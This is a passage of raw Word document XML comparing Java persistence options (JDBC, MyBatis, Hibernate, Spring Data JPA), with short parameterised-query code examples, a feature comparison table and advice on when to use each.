    <w:p w14:paraId="47305BCC"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PreparedStatement stmt = conn.prepareStatement(sql)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E8823"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF9772F"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stmt.setLong(1, id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E496C"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ResultSet rs = stmt.executeQuery();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F339E1B"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while (rs.next()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4564F9"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 Map result to Employee object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F8544"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E84F41"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 catch (SQLException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39354A61"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e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7335F1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE93C0F" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:ind w:left="720"/>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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B1FFA9" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="00000000" w:rsidP="00452C1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E1CB954">
          <v:rect id="_x0000_i2127" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A9EC1C" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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4. MyBatis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3AF5C" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1926"/>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Purpose</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: MyBatis is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>persistence framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides a middle ground between raw JDBC and full ORM frameworks like Hibernate. It uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rather than object mapping, giving you more control over SQL queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFB3750" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1926"/>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Main Features</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0385B835" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1926"/>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Maps SQL queries to Java methods using XML or annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF868F3" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1926"/>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Allows </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manual control</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of SQL queries and mappings between SQL results and Java objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF05BF" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1926"/>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Unlike JPA/Hibernate, it doesn’t abstract SQL but helps with simplifying the boilerplate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC5790" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1926"/>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Supports complex SQL queries with dynamic SQL generation and offers a finer level of control compared to JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE80DB9" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1926"/>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When to Use</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376346F4" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1926"/>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hen you need control over SQL queries but want to avoid the verbosity of JDBC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5C2D3" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1926"/>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When you need dynamic or complex SQL queries that are difficult to express in JPA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FFDBB" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1926"/>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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C25CA1F" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1926"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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lastRenderedPageBreak/>
        <w:t>&lt;select id="findByName" resultType="Employee"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C7E346" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1926"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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 xml:space="preserve">    SELECT * FROM employees WHERE name = #{name}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F66D05D" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1926"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26547B1E" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1926"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>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public List&lt;Employee&gt; findByName(String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12040724" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="00000000" w:rsidP="00452C1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FE837C">
          <v:rect id="_x0000_i2128" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F92B05E" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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Summary of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6"/>
        <w:gridCol w:w="2302"/>
        <w:gridCol w:w="2392"/>
        <w:gridCol w:w="1852"/>
        <w:gridCol w:w="2062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="4BF12591" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7984DA24" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78B188AB" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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Spring Data JPA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DD4F00C" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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Hibernate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D09D3CC" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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JDBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0F3856" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D"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MyBatis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="3C3C2CAA" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D3AFBEC"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Abstraction Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ADF7B2D"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High-level abstraction (JPA-based)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A8563A9"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Full ORM framework (JPA implementation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A4D1CF6"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Low-level API for direct SQL interaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B5D1003"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Mid-level (SQL mapping with more control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="54451ED4" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B8A4D0C"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SQL Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33BAB6A7"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Automatic with method names (via Spring Data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CFDF0B9"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Uses HQL (Hibernate Query Language) or native SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5508AAB2"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Manual SQL queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48893F10"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Uses XML or annotations for SQL mappings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="28F47316" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ABC98EF"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Learning Curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3043F493"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Low (easy to use with Spring)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A0A66AC"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Medium (requires knowledge of ORM concepts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C11A1F6"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High (requires manual handling of SQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B7F2D2B"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Medium (manual SQL but easier than raw JDBC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="143A51FC" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EFC9C4"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Complex Queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1C3593"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Can be done with JPQL, but automatic queries are limited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B402C48"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Powerful support for complex queries and caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47EFA4DE"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Full control over queries but more boilerplate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F94A2E7"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Allows complex queries, dynamic SQL generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="0AFAE4BC" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C67F0C3"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Transaction Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A8C35DD"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Handled by Spring automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FFB54FF"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Handled by Hibernate (via JPA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77F8A22F"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Handled manually by the developer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1872E654"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Handled by Spring or the developer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00452C19" w:rsidRPr="00452C19" w14:paraId="451AEE17" w14:textId="77777777" w:rsidTr="004F4C9D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5625A6F5"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D82FAB6"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CRUD operations with minimal setup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24D92609"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Advanced ORM needs (e.g., lazy loading, caching)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3994DBF2"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Full control over SQL execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EC6A0FE"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Simplified SQL mapping, dynamic query generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="352CBC93" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="00000000" w:rsidP="00452C1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5072031">
          <v:rect id="_x0000_i2129" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="104B338A" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When to Use Which:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3004EA55" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1927"/>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Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you want a high-level abstraction, minimal boilerplate, and are working in a Spring-based environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E975E" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1927"/>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Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you need a full-fledged ORM, and you're okay with handling complex ORM scenarios with automatic query generation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A21DED8" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1927"/>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JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you need fine control over SQL queries or need to work with legacy databases without ORM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706EDB4F" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1927"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MyBatis</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use when you need to manage complex or dynamic SQL queries while still having some level of abstraction over JDBC. It’s a good middle ground between JDBC and full ORM frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0538B" w14:textId="77777777" w:rsidR="004F4C9D" w:rsidRPr="00452C19" w:rsidRDefault="004F4C9D" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each of these technologies has its strengths, and the choice depends on the project requirements, team preferences, and the level of control needed over database interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCE1F18" w14:textId="528BB103" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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9065230">
